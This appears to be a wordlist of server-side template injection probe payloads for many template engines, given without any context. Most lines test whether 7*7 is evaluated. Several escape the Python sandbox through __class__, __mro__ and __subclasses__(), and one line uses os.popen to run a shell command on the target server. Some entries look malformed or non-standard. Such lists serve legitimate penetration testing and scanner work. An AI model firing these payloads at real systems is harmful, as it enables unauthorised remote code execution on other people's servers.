{7*7}
*{7*7}
{{7*7}}
[{7*7}]
${7*7}
@({7*7})
<?=7*7?>
<%= 7*7 %>
${=7*7}
{{=7*7}}
${{7*7}}
$ {{7*7}}
#{{7*7}}
#{7*7}
[=7*7]
{{7*7}}abc
{{7*7}}!
{{''.__class__.__mro__[2].__subclasses__()[40](7*7)}}
{{ [].__class__.__base__.__subclasses__()[59](7*7) }}
{{''.__class__.__base__.__subclasses__()[132](7*7)}}
{{ (lambda x: x*7)(7) }}
{{ ''.join(c for c in str(7*7)) }}
{{ ''.__class__.__name__[0]*7 }}
{{ range(1)[0] + 7*7 }}
{{ ''.__class__.mro()[1].__subclasses__()[40](7*7) }}
{{ [7][0]*7 }}
{{ ''.join([str(7)]*7) }}
{{ (7).__class__.__name__ }}
{{ cycler.__init__.__globals__.os.popen('expr 7 * 7').read() }}
{{ config.items()[4][1].__class__.__mro__[1].__subclasses__()[40](7*7) }}
{{ [i*7 for i in [7]][0] }}
{{ 7 | multiply(7) }}
{{ 7 | times:7 }}
